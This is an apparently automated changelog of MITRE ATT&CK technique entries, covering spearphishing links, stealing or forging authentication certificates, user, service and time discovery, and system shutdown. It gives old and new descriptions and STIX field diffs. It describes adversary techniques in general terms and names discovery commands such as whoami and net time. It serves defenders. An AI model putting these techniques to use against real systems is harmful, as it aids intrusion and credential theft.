>pically with OAuth 2.0 request URLs that when accepted by th>user provide permissions/access for malicious applications, 
>e user provide permissions/access for malicious applications>allowing adversaries to  [Steal Application Access Token](ht
>, allowing adversaries to  [Steal Application Access Token](>tps://attack.mitre.org/techniques/T1528)s.(Citation: Trend M
>https://attack.mitre.org/techniques/T1528)s.(Citation: Trend>icro Pawn Storm OAuth 2017) These stolen access tokens allow
> Micro Pawn Storm OAuth 2017) These stolen access tokens all> the adversary to perform various actions on behalf of the u
>ow the adversary to perform various actions on behalf of the>ser via API calls. (Citation: Microsoft OAuth 2.0 Consent Ph
> user via API calls. (Citation: Microsoft OAuth 2.0 Consent >ishing 2021)
>Phishing 2021) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 16:01:45.500000+00:002023-04-11 00:44:21.193000+00:00
descriptionAdversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'}
x_mitre_data_sourcesApplication Log: Application Log Content

[T1649] Steal or Forge Authentication Certificates

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may steal or forge certificates used for authentt1Adversaries may steal or forge certificates used for authent
>ication to access remote systems or resources. Digital certi>ication to access remote systems or resources. Digital certi
>ficates are often used to sign and encrypt messages and/or f>ficates are often used to sign and encrypt messages and/or f
>iles. Certificates are also used as authentication material.>iles. Certificates are also used as authentication material.
> For example, Azure AD device certificates and Active Direct> For example, Azure AD device certificates and Active Direct
>ory Certificate Services (AD CS) certificates bind to an ide>ory Certificate Services (AD CS) certificates bind to an ide
>ntity and can be used as credentials for domain accounts.(Ci>ntity and can be used as credentials for domain accounts.(Ci
>tation: O365 Blog Azure AD Device IDs)(Citation: Microsoft A>tation: O365 Blog Azure AD Device IDs)(Citation: Microsoft A
>D CS Overview)  Authentication certificates can be both stol>D CS Overview)  Authentication certificates can be both stol
>en and forged. For example, AD CS certificates can be stolen>en and forged. For example, AD CS certificates can be stolen
> from encrypted storage (in the Registry or files), misplace> from encrypted storage (in the Registry or files)(Citation:
>d certificate files (i.e. [Unsecured Credentials](https://at> APT29 Deep Look at Credential Roaming), misplaced certifica
>tack.mitre.org/techniques/T1552)), or directly from the Wind>te files (i.e. [Unsecured Credentials](https://attack.mitre.
>ows certificate store via various crypto APIs.(Citation: Spe>org/techniques/T1552)), or directly from the Windows certifi
>cterOps Certified Pre Owned)(Citation: GitHub CertStealer)(C>cate store via various crypto APIs.(Citation: SpecterOps Cer
>itation: GitHub GhostPack Certificates) With appropriate enr>tified Pre Owned)(Citation: GitHub CertStealer)(Citation: Gi
>ollment rights, users and/or machines within a domain can al>tHub GhostPack Certificates) With appropriate enrollment rig
>so request and/or manually renew certificates from enterpris>hts, users and/or machines within a domain can also request 
>e certificate authorities (CA). This enrollment process defi>and/or manually renew certificates from enterprise certifica
>nes various settings and permissions associated with the cer>te authorities (CA). This enrollment process defines various
>tificate. Of note, the certificate’s extended key usage (EKU> settings and permissions associated with the certificate. O
>) values define signing, encryption, and authentication use >f note, the certificate’s extended key usage (EKU) values de
>cases, while the certificate’s subject alternative name (SAN>fine signing, encryption, and authentication use cases, whil
>) values define the certificate owner’s alternate names.(Cit>e the certificate’s subject alternative name (SAN) values de
>ation: Medium Certified Pre Owned)  Abusing certificates for>fine the certificate owner’s alternate names.(Citation: Medi
> authentication credentials may enable other behaviors such >um Certified Pre Owned)  Abusing certificates for authentica
>as [Lateral Movement](https://attack.mitre.org/tactics/TA000>tion credentials may enable other behaviors such as [Lateral
>8). Certificate-related misconfigurations may also enable op> Movement](https://attack.mitre.org/tactics/TA0008). Certifi
>portunities for [Privilege Escalation](https://attack.mitre.>cate-related misconfigurations may also enable opportunities
>org/tactics/TA0004), by way of allowing users to impersonate> for [Privilege Escalation](https://attack.mitre.org/tactics
> or assume privileged accounts or permissions via the identi>/TA0004), by way of allowing users to impersonate or assume 
>ties (SANs) associated with a certificate. These abuses may >privileged accounts or permissions via the identities (SANs)
>also enable [Persistence](https://attack.mitre.org/tactics/T> associated with a certificate. These abuses may also enable
>A0003) via stealing or forging certificates that can be used> [Persistence](https://attack.mitre.org/tactics/TA0003) via 
> as [Valid Accounts](https://attack.mitre.org/techniques/T10>stealing or forging certificates that can be used as [Valid 
>78) for the duration of the certificate's validity, despite >Accounts](https://attack.mitre.org/techniques/T1078) for the
>user password resets. Authentication certificates can also b> duration of the certificate's validity, despite user passwo
>e stolen and forged for machine accounts.  Adversaries who h>rd resets. Authentication certificates can also be stolen an
>ave access to root (or subordinate) CA certificate private k>d forged for machine accounts.  Adversaries who have access 
>eys (or mechanisms protecting/managing these keys) may also >to root (or subordinate) CA certificate private keys (or mec
>establish [Persistence](https://attack.mitre.org/tactics/TA0>hanisms protecting/managing these keys) may also establish [
>003) by forging arbitrary authentication certificates for th>Persistence](https://attack.mitre.org/tactics/TA0003) by for
>e victim domain (known as “golden” certificates).(Citation: >ging arbitrary authentication certificates for the victim do
>Medium Certified Pre Owned) Adversaries may also target cert>main (known as “golden” certificates).(Citation: Medium Cert
>ificates and related services in order to access other forms>ified Pre Owned) Adversaries may also target certificates an
> of credentials, such as [Golden Ticket](https://attack.mitr>d related services in order to access other forms of credent
>e.org/techniques/T1558/001) ticket-granting tickets (TGT) or>ials, such as [Golden Ticket](https://attack.mitre.org/techn
> NTLM plaintext.(Citation: Medium Certified Pre Owned)>iques/T1558/001) ticket-granting tickets (TGT) or NTLM plain
 >text.(Citation: Medium Certified Pre Owned)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 21:02:00.546000+00:002023-03-02 19:06:41.828000+00:00
descriptionAdversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)
external_references[1]['description']HarmJ0y & subat0mik. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Command: Command ExecutionActive Directory: Active Directory Object Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'APT29 Deep Look at Credential Roaming', 'description': 'Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.', 'url': 'https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming'}
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_data_sourcesActive Directory: Active Directory Object Modification

[T1033] System Owner/User Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to identify the primary user, current1Adversaries may attempt to identify the primary user, curren
>tly logged in user, set of users that commonly uses a system>tly logged in user, set of users that commonly uses a system
>, or whether a user is actively using the system. They may d>, or whether a user is actively using the system. They may d
>o this, for example, by retrieving account usernames or by u>o this, for example, by retrieving account usernames or by u
>sing [OS Credential Dumping](https://attack.mitre.org/techni>sing [OS Credential Dumping](https://attack.mitre.org/techni
>ques/T1003). The information may be collected in a number of>ques/T1003). The information may be collected in a number of
> different ways using other Discovery techniques, because us> different ways using other Discovery techniques, because us
>er and username details are prevalent throughout a system an>er and username details are prevalent throughout a system an
>d include running process ownership, file/directory ownershi>d include running process ownership, file/directory ownershi
>p, session information, and system logs. Adversaries may use>p, session information, and system logs. Adversaries may use
> the information from [System Owner/User Discovery](https://> the information from [System Owner/User Discovery](https://
>attack.mitre.org/techniques/T1033) during automated discover>attack.mitre.org/techniques/T1033) during automated discover
>y to shape follow-on behaviors, including whether or not the>y to shape follow-on behaviors, including whether or not the
> adversary fully infects the target and/or attempts specific> adversary fully infects the target and/or attempts specific
> actions.  Various utilities and commands may acquire this i> actions.  Various utilities and commands may acquire this i
>nformation, including <code>whoami</code>. In macOS and Linu>nformation, including <code>whoami</code>. In macOS and Linu
>x, the currently logged in user can be identified with <code>x, the currently logged in user can be identified with <code
>>w</code> and <code>who</code>. On macOS the <code>dscl . li>>w</code> and <code>who</code>. On macOS the <code>dscl . li
>st /Users | grep -v '_'</code> command can also be used to e>st /Users | grep -v '_'</code> command can also be used to e
>numerate user accounts. Environment variables, such as <code>numerate user accounts. Environment variables, such as <code
>>%USERNAME%</code> and <code>$USER</code>, may also be used >>%USERNAME%</code> and <code>$USER</code>, may also be used 
>to access this information.>to access this information.  On network devices, [Network De
 >vice CLI](https://attack.mitre.org/techniques/T1059/008) com
 >mands such as `show users` and `show ssh` can be used to dis
 >play users currently logged into the device.(Citation: show_
 >ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Inf
 >rastructure Devices 2018)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Austin Clark, @c2defense']
external_referencesCisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-577
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 19:04:03.271000+00:002023-04-12 23:35:40.261000+00:00
descriptionAdversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
external_references[1]['source_name']capecshow_ssh_users_cmd_cisco
external_references[1]['url']https://capec.mitre.org/data/definitions/577.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Windows Registry: Windows Registry Key AccessProcess: OS API Execution
x_mitre_data_sources[7]Process: OS API ExecutionWindows Registry: Windows Registry Key Access
x_mitre_data_sources[8]Active Directory: Active Directory Object AccessCommand: Command Execution
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.
x_mitre_version1.31.4
x_mitre_data_sources[3]Command: Command ExecutionActive Directory: Active Directory Object Access
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT TA18-106A Network Infrastructure Devices 2018', 'description': 'US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/TA18-106A'}
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T1007] System Service Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-15 13:35:54.740000+00:002023-04-03 18:55:18.326000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/574.html', 'external_id': 'CAPEC-574'}
x_mitre_data_sourcesCommand: Command Execution

[T1529] System Shutdown/Reboot

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may shutdown/reboot systems to interrupt access t1Adversaries may shutdown/reboot systems to interrupt access 
>to, or aid in the destruction of, those systems. Operating s>to, or aid in the destruction of, those systems. Operating s
>ystems may contain commands to initiate a shutdown/reboot of>ystems may contain commands to initiate a shutdown/reboot of
> a machine or network device. In some cases, these commands > a machine or network device. In some cases, these commands 
>may also be used to initiate a shutdown/reboot of a remote c>may also be used to initiate a shutdown/reboot of a remote c
>omputer or network device via [Network Device CLI](https://a>omputer or network device via [Network Device CLI](https://a
>ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co>ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co
>de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert>de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert
>_TA18_106A) Shutting down or rebooting systems may disrupt a>_TA18_106A)  Shutting down or rebooting systems may disrupt 
>ccess to computer resources for legitimate users.  Adversari>access to computer resources for legitimate users while also
>es may attempt to shutdown/reboot a system after impacting i> impeding incident response/recovery.  Adversaries may attem
>t in other ways, such as [Disk Structure Wipe](https://attac>pt to shutdown/reboot a system after impacting it in other w
>k.mitre.org/techniques/T1561/002) or [Inhibit System Recover>ays, such as [Disk Structure Wipe](https://attack.mitre.org/
>y](https://attack.mitre.org/techniques/T1490), to hasten the>techniques/T1561/002) or [Inhibit System Recovery](https://a
> intended effects on system availability.(Citation: Talos Ny>ttack.mitre.org/techniques/T1490), to hasten the intended ef
>etya June 2017)(Citation: Talos Olympic Destroyer 2018)>fects on system availability.(Citation: Talos Nyetya June 20
 >17)(Citation: Talos Olympic Destroyer 2018)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:27:57.587000+00:002023-03-22 20:45:22.531000+00:00
descriptionAdversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsHubert Mank

[T1124] System Time Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An adversary may gather the system time and/or time zone frot1An adversary may gather the system time and/or time zone fro
>m a local or remote system. The system time is set and store>m a local or remote system. The system time is set and store
>d by the Windows Time Service within a domain to maintain ti>d by the Windows Time Service within a domain to maintain ti
>me synchronization between systems and services in an enterp>me synchronization between systems and services in an enterp
>rise network. (Citation: MSDN System Time) (Citation: Techne>rise network. (Citation: MSDN System Time)(Citation: Technet
>t Windows Time Service)  System time information may be gath> Windows Time Service)  System time information may be gathe
>ered in a number of ways, such as with [Net](https://attack.>red in a number of ways, such as with [Net](https://attack.m
>mitre.org/software/S0039) on Windows by performing <code>net>itre.org/software/S0039) on Windows by performing <code>net 
> time \\hostname</code> to gather the system time on a remot>time \\hostname</code> to gather the system time on a remote
>e system. The victim's time zone may also be inferred from t> system. The victim's time zone may also be inferred from th
>he current system time or gathered by using <code>w32tm /tz<>e current system time or gathered by using <code>w32tm /tz</
>/code>. (Citation: Technet Windows Time Service)  This infor>code>.(Citation: Technet Windows Time Service)  On network d
>mation could be useful for performing other techniques, such>evices, [Network Device CLI](https://attack.mitre.org/techni
> as executing a file with a [Scheduled Task/Job](https://att>ques/T1059/008) commands such as `show clock detail` can be 
>ack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're >used to see the current time configuration.(Citation: show_c
>Inside), or to discover locality information based on time z>lock_detail_cisco_cmd)  This information could be useful for
>one to assist in victim targeting (i.e. [System Location Dis> performing other techniques, such as executing a file with 
>covery](https://attack.mitre.org/techniques/T1614)). Adversa>a [Scheduled Task/Job](https://attack.mitre.org/techniques/T
>ries may also use knowledge of system time as part of a time>1053)(Citation: RSA EU12 They're Inside), or to discover loc
> bomb, or delaying execution until a specified date/time.(Ci>ality information based on time zone to assist in victim tar
>tation: AnyRun TimeBomb)>geting (i.e. [System Location Discovery](https://attack.mitr
 >e.org/techniques/T1614)). Adversaries may also use knowledge
 > of system time as part of a time bomb, or delaying executio
 >n until a specified date/time.(Citation: AnyRun TimeBomb)

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesCisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-295
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 23:09:24.799000+00:002023-04-12 23:37:22.508000+00:00
descriptionAn adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
external_references[1]['source_name']capecshow_clock_detail_cisco_cmd
external_references[1]['url']https://capec.mitre.org/data/definitions/295.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674
external_references[2]['source_name']MSDN System TimeAnyRun TimeBomb
external_references[2]['description']Microsoft. (n.d.). System Time. Retrieved November 25, 2016.Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.
external_references[2]['url']https://msdn.microsoft.com/ms724961.aspxhttps://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/
external_references[4]['source_name']RSA EU12 They're InsideMSDN System Time
external_references[4]['description']Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.Microsoft. (n.d.). System Time. Retrieved November 25, 2016.
external_references[4]['url']https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdfhttps://msdn.microsoft.com/ms724961.aspx
external_references[5]['source_name']AnyRun TimeBombRSA EU12 They're Inside
external_references[5]['description']Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.
external_references[5]['url']https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf
x_mitre_data_sources[1]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[2]Process: OS API ExecutionProcess: Process Creation
